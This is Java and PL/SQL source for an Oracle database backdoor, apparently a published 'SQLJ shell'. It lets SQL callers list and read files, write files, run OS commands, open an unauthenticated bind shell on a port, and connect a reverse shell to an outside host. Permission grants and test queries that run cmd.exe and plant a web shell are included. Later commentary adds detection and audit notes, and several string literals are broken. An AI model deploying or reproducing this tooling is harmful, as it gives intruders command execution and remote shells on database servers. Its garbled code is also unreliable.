ORACLE(SQLJ-SHELL)
create or replace and compile java source named isto as
import java.io.*;
import java.net.*;
// Oracle "SQLJ shell": a Java class loaded into the database JVM whose static
// methods expose directory listing, file read/write, OS command execution and a
// network shell to SQL callers (see the PL/SQL call specs that follow the class).
// Everything here executes inside the Oracle server process, with that process's
// OS identity and whatever Java permissions Dbms_Java.Grant_Permission has given.
// NOTE(review): no method below authenticates or restricts its caller; the only
// control is whatever the database applies to callers of the wrapper functions.
// Several string literals below span a line break in this rendering — presumably
// "\n" escapes were lost when the page was published; as shown they would not compile.
public class ISTO{
//author: kj021320
//team: I.S.T.O
// Lists the entry names of a directory.
// path: directory to list. Each File.list() entry is appended followed by the
// separator literal (see note above). Returns "" when File.list() yields null
// (path is not a directory, or it cannot be read). Never throws.
public static String listFolder(String path){
File f=null;
String str="";
f=new File(path);
String[] files=f.list();
if(files!=null)
for(int i=0;i<files.length;i++){
str+=files[i]+"
";
}
return str;
}
// Writes value to filepath, creating or truncating the file.
// Bytes come from value.getBytes(), i.e. the JVM default charset, not a
// caller-chosen one. Returns "OK", or the exception message on failure; no
// exception escapes. Close errors in finally are swallowed.
public static String saveFile(String filepath,String value){
FileOutputStream fos=null;
try {
fos=new FileOutputStream(filepath);
fos.write(value.getBytes());
return "OK";
} catch (Exception e) {
return e.getMessage();
} finally{
if(fos!=null){
try {fos.close();} catch (Exception e) {}
}
}
}
// Reads pathfile as text in charset `code` and returns all of its lines
// concatenated. readLine() strips line terminators and nothing re-inserts them,
// so the result carries no line breaks. Returns the exception message on
// failure (unreadable file, unknown charset name, ...). Never throws.
public static String readFile(String pathfile,String code){
BufferedReader br=null;
String value="";
try {
br=new BufferedReader(new InputStreamReader(new FileInputStream(pathfile),code));
String s=null;
while((s=br.readLine())!=null){
value+=s;
}
return value;
} catch (Exception e) {
return e.getMessage();
} finally{
if(br!=null){try {br.close();} catch (IOException e) {}}
}
}
// Runs filepath as an OS command via Runtime.exec(String) — the single string is
// split on whitespace into command and arguments — and returns the child's
// standard output decoded with charset `code`. Reading stops at EOF on stdout;
// standard error is never read and waitFor() is never called. Returns the
// exception message on failure. Never throws.
// Detection: a child process spawned by the database server process.
public static String execFile(String filepath,String code){
int i=0;
Runtime rt=Runtime.getRuntime();
String output="";
InputStreamReader isr = null;
char[] bufferC=new char[1024];
try{
Process ps=rt.exec(filepath);
isr=new InputStreamReader(ps.getInputStream(),code);
while((i=isr.read(bufferC,0,bufferC.length))!=-1){
output+=new String(bufferC,0,i);
}
return output;
}catch(Exception e){
return e.getMessage();
}finally{
if(isr!=null)try {isr.close();} catch (IOException e) {}
}
}
// Opens a listening TCP socket on port, blocks the calling database session in
// accept() until one peer connects, then hands both sockets to an optShell
// thread and returns "OK". Exactly one connection is ever accepted; the
// ServerSocket is closed by the optShell thread when that session ends. If the
// ServerSocket constructor succeeds but accept() throws, ss is not closed here.
// Detection: the database server process starts listening on an arbitrary port
// (the test statements below use 20000).
public static String bindShell(int port){
ServerSocket ss=null;
Socket s=null;
try {
ss = new ServerSocket(port);
s=ss.accept();
new optShell(ss,s).start();
return "OK";
} catch (Exception e) {
return e.getMessage();
}
}
// Connects out to host:port and serves the same optShell protocol over that
// connection (ss is null, so nothing listens). Not exposed by any call spec on
// this page. Detection: an outbound TCP connection originating from the database
// server process.
public static String reverseShell(String host,int port){
Socket s=null;
try{
s=new Socket(host,port);
new optShell(null,s).start();
return "OK";
}catch(Exception e){
return e.getMessage();
}
}
// Single-connection, line-oriented text shell served over a socket. There is no
// authentication: whoever holds the connection can drive every static method
// above. ss is null when created by reverseShell.
public static class optShell extends Thread{
OutputStream os=null; // socket output; prompts and results are written here
InputStream is=null;  // socket input; commands and arguments are read here
ServerSocket ss;      // listening socket to close when the session ends, or null
Socket s;             // the peer connection
// Captures the socket's streams. On failure it closes whatever it holds and
// swallows the error without rethrowing, so the caller still start()s the
// thread; run() then dereferences a null `is` before its try block and the
// thread dies from the NullPointerException without reaching run()'s finally.
public optShell(ServerSocket ss,Socket s){
this.ss=ss;
this.s=s;
try{
this.is=s.getInputStream();
this.os=s.getOutputStream();
}catch(Exception e){
if(os!=null)try {os.close();} catch(Exception ex) {}
if(is!=null)try {is.close();} catch(Exception ex) {}
if(s!=null)try {s.close();} catch(Exception ex) {}
if(ss!=null)try {ss.close();} catch(Exception ex) {}
}
}
// Command loop. Each request is one line; the first four characters of the
// trimmed line select list/save/read/exec, anything else (including lines of
// three characters or fewer) is answered with cmdhelp, and the exact line
// "exit" ends the session. Each command then prompts for and reads one argument
// line at a time; the charset prompts expect a Java charset name (the prompt
// text suggests GBK). Input is decoded with the JVM default charset
// (InputStreamReader without a charset) and replies are encoded with getBytes().
// The length check runs before trim(): a whitespace-padded line whose trimmed
// form is shorter than four characters makes substring(0, 4) throw, and a peer
// disconnect makes readLine() return null, which "exit".equals(null) does not
// stop and line.length() then dereferences. Both reach the catch below, which
// prints the trace to standard error; finally then closes every stream and socket.
// The initial cmdhelp write is commented out, so the banner is only ever sent
// in response to an unrecognized command.
public void run(){
BufferedReader br=new BufferedReader(new InputStreamReader(is));
String line="";
String cmdhelp="Command:
list
save
read
exec
exit
";
try {
//os.write(cmdhelp.getBytes());
line=br.readLine();
while(!"exit".equals(line)){
if(line.length()>3){
StringBuffer sb=new StringBuffer(line.trim());
String cmd=sb.substring(0, 4);
if(cmd.equals("list")){
os.write("input you path:
".getBytes());
line=br.readLine();
os.write(listFolder(line).getBytes());
}else if("save".equals(cmd)){
os.write("input you filepath:
".getBytes());
line=br.readLine();
os.write("input you value:
".getBytes());
os.write(saveFile(line,br.readLine()).getBytes());
}else if("read".equals(cmd)){
os.write("input you filepath:
".getBytes());
line=br.readLine();
os.write("input you code examle:GBK
".getBytes());
os.write(readFile(line,br.readLine()).getBytes());
}else if("exec".equals(cmd)){
os.write("input you run filepath:
".getBytes());
line=br.readLine();
os.write("input you code examle:GBK
".getBytes());
os.write(execFile(line,br.readLine()).getBytes());
}else{
os.write(cmdhelp.getBytes());
}
}else{
os.write(cmdhelp.getBytes());
}
line=br.readLine();
}
} catch (Exception e) {
e.printStackTrace();
}finally{
if(os!=null)try {os.close();} catch(Exception e) {}
if(is!=null)try {is.close();} catch(Exception e) {}
if(s!=null)try {s.close();} catch(Exception e) {}
if(ss!=null)try {ss.close();} catch(Exception e) {}
}
}
}
}
以上建立完成之后 需要用ORACLE的函数调用JAVA的静态方法
-- PL/SQL call specifications: each SQL-callable function maps directly onto a
-- static method of the ISTO Java class above and runs inside the database
-- server process. Any session allowed to execute these functions gets the
-- corresponding filesystem / command / network capability. Note that
-- ISTO.reverseShell has no call spec here.
-- directory listing function
create or replace function ISTO_LISTFOLDER(str varchar2) return varchar2
as language java name ISTO.listFolder(java.lang.String) return java.lang.String;
-- save (write) file function
create or replace function ISTO_SAVEFILE(p varchar2,v varchar2) return varchar2
as language java name ISTO.saveFile(java.lang.String,java.lang.String) return java.lang.String;
-- read file function
create or replace function ISTO_READFILE(p varchar2,c varchar2) return varchar2
as language java name ISTO.readFile(java.lang.String,java.lang.String) return java.lang.String;
-- run file (OS command) function
create or replace function ISTO_EXECFILE(fp varchar2,c varchar2) return varchar2
as language java name ISTO.execFile(java.lang.String,java.lang.String) return java.lang.String;
-- port binding; the author notes you can telnet in. The call blocks until a
-- peer connects and the listener is served by a thread in the server process.
create or replace function ISTO_BINDSHELL(port number) return varchar2
as language java name ISTO.bindShell(int) return java.lang.String;
以上函数转换操作之后 需要给JAVA授予访问权限
-- Java permission grants the class needs in order to work. 用户名字 ("user name")
-- stands for the grantee schema; the quote characters around the arguments appear
-- to have been lost in this rendering. Together these grant unrestricted filesystem
-- access (<<ALL FILES>> read/write/execute/delete), file-descriptor writing, and
-- unrestricted network accept/connect/listen/resolve to that schema's Java code.
-- Audit point: such grants are visible in the DBA_JAVA_POLICY view and are a strong
-- indicator to review on any database where they are not expected.
begin
Dbms_Java.Grant_Permission(用户名字,java.io.FilePermission,<<ALL FILES>>,read,write,execute,delete);
Dbms_Java.Grant_Permission(用户名字,java.lang.RuntimePermission,*,writeFileDescriptor);
Dbms_Java.grant_permission(用户名字,java.net.SocketPermission,*:*,accept,connect,listen,resolve);
end;
然后就可以进行文件操作以及 运行程序 开启网络!
以下为测试代码
-- Author's test statements. String quotes (and, on the Windows path, the backslashes)
-- appear to have been lost in this rendering; as shown these would not parse.
-- Each call executes the corresponding Java method in the database server process
-- and returns its String result as the SELECT value.
SELECT ISTO_LISTFOLDER(/usr) FROM DUAL
SELECT ISTO_EXECFILE(C:WINDOWSsystem32cmd.exe /c dir c:,GBK) FROM DUAL;
SELECT ISTO_READFILE(/tmp/1.txt,GBK) FROM DUAL;
SELECT ISTO_SAVEFILE(/tmp/1.txt,一句话shell) FROM DUAL;
-- Blocks this session until a peer connects to port 20000 on the server.
SELECT ISTO_BINDSHELL(20000) FROM DUAL